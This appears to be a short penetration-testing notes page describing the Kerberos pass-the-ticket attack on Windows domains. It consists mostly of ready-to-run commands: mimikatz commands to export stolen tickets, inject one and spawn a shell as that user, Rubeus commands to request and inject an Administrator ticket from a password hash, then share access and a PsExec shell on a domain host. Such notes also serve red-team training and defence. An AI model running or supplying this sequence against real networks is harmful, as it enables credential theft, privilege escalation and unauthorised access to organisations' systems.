Pass The Ticket
Pass The Ticket
In a pass the ticket attack access is gained to a resource of a system (for example the administrative shares) using a Kerberos ticket that was generated or obtained from a compromised machine (TGT or TGS)
PtT affects all windows platforms relying on kerberos.
run these in mimikatz:
kerberos::list
kerberos::list /export
we have the tickets that were saved inside the directory where we had the mimikatz executable.

We go back to the mimikatz terminal. Here, we pass the ticket with the help of ptt module inside the Kerberos module followed by the name of the ticket that we want to pass.to perform the actions as the user that we passed the ticket for we decided to get a cmd as that user. This can be accomplished using the misc::cmd command as shown in the image given below.
kerberos::ptt ticket.kirbi
misc::cmd

Rubeus
rubeus is a C# toolset for raw Kerberos interaction and abuses.
we will use extract the tickets using Rubeus. This can be done with the help of the asktgt module. Although it is not so sneaky method it gets the work done. We need the domain name, User, Password Hash. When used normally will give the base64 encoded TGT ticket. But Let’s Pass the Ticket as well in the same step
Rubeus.exe asktgt /domain:ignite.local /user:Administrator /rc4: 32196b56ffe6f45e294117b91a83bf38 /ptt
or pass the ticket with kirbi file:
Rubeus.exe ptt /ticket:ticket.kirbi
now we have the ticket for user administrator and we can access shares:
dir \\overloadDC\\secret_shares
or get shell access:
PsExec.exe \\192.168.1.105 cmd.exe
Last updated